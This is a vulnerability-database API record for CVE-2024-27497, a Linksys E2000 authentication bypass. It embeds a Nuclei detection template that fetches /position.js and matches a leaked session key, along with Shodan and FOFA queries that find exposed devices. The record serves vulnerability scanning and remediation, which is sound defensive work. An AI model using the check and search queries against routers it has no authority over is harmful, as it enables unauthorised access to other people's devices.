{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-27497/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-27497/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-27497/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-27497/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-27497/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-27497"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-27497"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-27497.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2024-27497\n\ninfo:\n  name: Linksys E2000 1.0.06 position.js Improper Authentication\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n  impact: |\n    Successful exploitation could lead to unauthorized access to the device.\n  remediation: |\n    Upgrade to a patched version of the firmware to mitigate the vulnerability.\n  reference:\n    - https://warp-desk-89d.notion.site/Linksys-E-2000-efcd532d8dcf4710a4af13fca131a5b8\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-27497\n    - https://github.com/Ostorlab/KEV\n    - https://github.com/fkie-cad/nvd-json-data-feeds\n  classification:\n    epss-score: 0.26657\n    epss-percentile: 0.97932\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: product:\"Linksys E2000 WAP http config\"\n    fofa-query: app=\"LINKSYS-E2000\"\n  tags: cve,cve2024,linksys,auth-bypass,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/position.js\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"var session_key\"\n          - \"close_session\"\n          - \"HELPPATH\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100c8e60b27db4e656be87ca691b29ebd8714465d06b856315977ce5f383b8f413f022100a7113eef64347b8ae0de1d0943e41772c65105755e25f930d53c9895501757fa:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-27497"
}